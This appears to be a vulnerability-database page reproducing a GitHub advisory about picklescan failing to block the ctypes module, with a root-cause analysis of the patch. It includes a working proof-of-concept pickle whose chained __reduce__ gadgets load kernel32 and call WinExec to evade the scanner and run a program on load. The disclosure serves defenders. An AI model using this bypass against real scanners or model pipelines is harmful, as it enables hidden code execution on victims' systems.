N/A

CVSS Score

-

CVSS Score

Basic Information

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

GHSA-4675-36f9-wf6r

GHSA-4675-36f9-wf6r: Picklescan does not block ctypes

Summary

Picklescan doesnt flag ctypes module as a dangerous module, which is a huge issue. ctypes is basically a foreign function interface library and can be used to

Load DLLs
Call C functions directly
Manipulate memory raw pointers.

This can allow attackers to achieve RCE by invoking direct syscalls without going through blocked modules. Another major issue that ctypes being allowed presents is that it can be used down the line to dismantle interpreter based python sandboxes as ctypes allow direct access to raw memory.

This is a more severe loophole than normal gadget chains and bypasses as raw memory access can be used for a lot of nefarious purposes down the line if left undetected

PoC

import pickle
import ctypes
import operator

class Kernel32Loader:
    def __reduce__(self):
        #we go direct to the kerneeellllllll
        return (ctypes.WinDLL, ("kernel32.dll",))

class WinExecGetter:
    def __reduce__(self):
        return (operator.itemgetter("WinExec"), (Kernel32Loader(),))

class PopCalc:
    def __reduce__(self):
        #methodcaller to invoke "__call__" on the function pointer.
        return (
            operator.methodcaller("__call__", b"calc.exe", 1), 
            (WinExecGetter(),)
        )

try:
    payload = pickle.dumps(PopCalc())
    
    with open("calc_exploit.pkl", "wb") as f:
        f.write(payload)
        
    print("Generated 'calc_exploit.pkl'")

except Exception as e:
    print(f"Generation failed: {e}")

This will create a pickle file which is not detected by the latest version of picklescan as malicious

import pickle
print("Loading bypass.pkl...")
pickle.load(open("calc_exploit.pkl", "rb"))

(GitHub Advisory)

Miggo Vulnerability Database

→

GHSA-4675-36f9-wf6r

GHSA-4675-36f9-wf6r:

N/A

CVSS Score

-

CVSS Score

Basic Information

Technical Details

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
picklescan	pip	< 0.0.33	0.0.33

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability in picklescan is due to an incomplete blocklist of dangerous modules. The ctypes module, which allows for foreign function interface interactions and can be used for remote code execution, was not included in the _unsafe_globals list. The patch rectifies this by adding "ctypes": "*" to this blocklist within src/picklescan/scanner.py.

The function _build_scan_result_from_raw_globals is the core component that uses this blocklist to determine if a global is malicious. Before the patch, it would incorrectly classify ctypes as safe. The main user-facing functions, scan_pickle_file and scan_pickle_bytes, rely on this flawed logic, and thus are the entry points for the vulnerability. When picklescan is used to scan a malicious pickle file, these functions would appear in a runtime profile and would fail to report the threat. The patch fixes the vulnerability by updating the blocklist data that these functions depend on.

Vulnerable functions

picklescan.scanner._build_scan_result_from_raw_globals

src/picklescan/scanner.py

This internal function is responsible for checking the globals found in a pickle file against a list of unsafe globals. Before the patch, the `ctypes` module was not in the list of unsafe globals, so this function would not flag its usage as dangerous. The patch adds `ctypes` to the blocklist, making this function effective against this vulnerability.

picklescan.scanner.scan_pickle_file

src/picklescan/scanner.py

This is a primary entry point for scanning pickle files. A call to this function with a malicious pickle file containing `ctypes` would have failed to detect the vulnerability before the patch. The function's behavior is corrected by the patch's update to the underlying blocklist.

picklescan.scanner.scan_pickle_bytes

src/picklescan/scanner.py

This is a primary entry point for scanning pickle data as bytes. A call to this function with malicious pickle bytes containing `ctypes` would have failed to detect the vulnerability before the patch. The function's behavior is corrected by the patch's update to the underlying blocklist.

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.

N/A

-

Basic Information

Basic Information

Concerned about an active attack path?

GHSA-4675-36f9-wf6r: Picklescan does not block ctypes

Summary

PoC

GHSA-4675-36f9-wf6r:

N/A

-

Basic Information

Basic Information

Technical Details

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability IntelligenceMiggo AI

Basic Information

Basic Information

N/A

N/A

Technical Details

GHSA-4675-36f9-wf6r: Picklescan does not block ctypes

Summary

PoC

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI